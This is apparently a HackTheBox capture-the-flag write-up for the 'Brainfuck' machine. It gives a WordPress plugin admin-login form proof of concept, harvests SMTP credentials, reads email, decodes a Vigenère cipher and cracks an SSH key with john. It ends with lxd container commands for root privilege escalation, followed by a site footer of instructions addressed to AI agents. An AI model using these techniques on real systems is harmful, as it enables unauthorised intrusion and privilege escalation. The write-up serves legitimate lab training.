# BrainFuck

## Gaining Access

Nmap scan:

<figure><img src="/files/42eCJiDCswucR2Bdpdux" alt=""><figcaption></figcaption></figure>

We can add `brainfuck.htb` to our `/etc/hosts` file and visit the HTTP wesbites.

### Wordpress Ticket System

Website revealed a Wordpress site:

<figure><img src="/files/O6FSUzpcjlnG1QG3gqDk" alt=""><figcaption></figcaption></figure>

Because this was a HTTPS website, we can take a look at the certificate first to find an email address.

<figure><img src="/files/JZ3Q5aw6dQBxiZoXZrw8" alt=""><figcaption></figcaption></figure>

Looking at the alternate DNS names, we can find another hidden subdomain, which we'll visit later.

<figure><img src="/files/doXyvqJXsZBPjpTmeiwE" alt=""><figcaption></figcaption></figure>

We can run `wpscan --enumerate p,t,u` on this website. This returns a plugin that is outdated and exploitable.

<figure><img src="/files/eZzgtdU5OnBl6uhVrtoM" alt=""><figcaption></figcaption></figure>

For this version, there are SQL Injection and Privilege Escalation exploits available.

<figure><img src="/files/3xj84H4MhulpbmjzIkxS" alt=""><figcaption></figcaption></figure>

Based on the PoC for the Privilege Escalation one, we have to create some HTML code that would allow us to login as the administrator. Earlier, we found an email address for the user `orestis`. We can use that for our exploit.

Here's the HTML frames we need:

```markup
<form method="post" action="https://brainfuck.htb/wp-admin/admin-ajax.php">
        Username: <input type="text" name="username" value="admin">
        <input type="hidden" name="email" value="orestis@brainfuck.htb">
        <input type="hidden" name="action" value="loginGuestFacebook">
        <input type="submit" value="Login">
</form>
```

Afterwards, we just need to set this up on a Python server and visit the site. The username is based on the username of the first post we saw.

<figure><img src="/files/CmKsh6wM1eaLatzSF5QM" alt=""><figcaption></figcaption></figure>

Initially, nothing happens when we click the login button, however after refreshing the page, we are notified that we have logged in as the administrator.

<figure><img src="/files/srAguemvagmE1IWC7dh8" alt=""><figcaption></figcaption></figure>

### SMTP Creds

When viewing the plugins, we can find another plugin that enables SMTP on the Wordpress site.

<figure><img src="/files/UqmKQJfDgmikLdz1qzm5" alt=""><figcaption></figcaption></figure>

When viewing the SMTP configuration settings, we can find the username and password for port 110.

<figure><img src="/files/dZaj5D3yJZXQu2Eehe6f" alt=""><figcaption></figcaption></figure>

The password can be taken by viewing the page source to reveal the hidden value.

<figure><img src="/files/YlUkSsaFST2x6A9pXXND" alt=""><figcaption></figcaption></figure>

We can then proceed to enumerate the SMTP instance.

### Reading Emails

We can sign in to the service on port 110.

<figure><img src="/files/NrWR9HQcz9ZbJSKIl783" alt=""><figcaption></figcaption></figure>

Then, we can view the messages sent using `list`.

<figure><img src="/files/IGwNrpJo6UJw3rhEfbmt" alt=""><figcaption></figcaption></figure>

We can read both the emails, and one of them has credentials for a forum page.

<figure><img src="/files/1kXtGYoArUEgI5Kej8JR" alt=""><figcaption></figcaption></figure>

These are probably credentials for the secret subdomain we found earlier.

### Forum Page

We can login to the forum page here using the credentials we found earlier. Then, we can view the pages that are present.

<figure><img src="/files/Nd2Him8F4xfhyAnBXuDQ" alt=""><figcaption></figcaption></figure>

Some of the forum pages mention sending SSH keys somehow.

<figure><img src="/files/vQwjZX2yaPiGezMsPwrJ" alt=""><figcaption></figcaption></figure>

There was also an encrypted few posts.

<figure><img src="/files/ZDarC5hWiQsBGMNTHIFZ" alt=""><figcaption></figcaption></figure>

There was clearly a URL within that, and it seems that numbers **are not being scrambled**. This means this is a letter-only cipher. After a bit of research and testing on CyberChef, Vignere cipher is the one used here.

<figure><img src="/files/wCKKKQk1Q2tF4aMhaMP2" alt=""><figcaption></figcaption></figure>

Then, we can head to that website to find the `id_rsa` file for `orestis`.

<figure><img src="/files/8Rmm2Ti4yE9gQYcDtixN" alt=""><figcaption></figcaption></figure>

The file is password encrypted, so we have to use `ssh2john.py` to convert this to a hash for `john` to crack.

<figure><img src="/files/objc69ueAa9cfWbe73qQ" alt=""><figcaption></figcaption></figure>

Then we can use `openssl rsa` to write the key out.

<figure><img src="/files/grXGpeMbHD4AdxG4jqbk" alt=""><figcaption></figcaption></figure>

Afterwards, we can simply SSH in using this key.

<figure><img src="/files/M6tcMNX76aFOG6Al0MYn" alt=""><figcaption></figcaption></figure>

## Privilege Escalation

### lxd

When enumerating using LinPEAS, we can see that the user is part of the `lxd` group.

<figure><img src="/files/1jLsORzGyeaUhf81bnJ0" alt=""><figcaption></figcaption></figure>

Being part of this group means that we can create and manage extra containers for this machine. The exploit path is to create a container where we have root privileges and it is mounted onto the main disk.

{% embed url="<https://book.hacktricks.xyz/linux-hardening/privilege-escalation/interesting-groups-linux-pe/lxd-privilege-escalation>" %}

I downloaded an alpine distro to the machine. Then, we can execute the commands from HackTricks:

```bash
# import the image
lxc image import ./alpine*.tar.gz --alias myimage # It's important doing this from YOUR HOME directory on the victim machine, or it might fail.

# before running the image, start and configure the lxd storage pool as default 
lxd init

# run the image
lxc init myimage mycontainer -c security.privileged=true

# mount the /root into the image
lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true

# interact with the container
lxc start mycontainer
lxc exec mycontainer /bin/sh
```

The last command would drop us into a root shell, where the `/root` directory has been mounted and we can grab the root flag.

<figure><img src="/files/Ma1IWJPkZqt9LNCvqr1O" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://rouvin.gitbook.io/ibreakstuff/writeups/hackthebox/insane/brainfuck.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.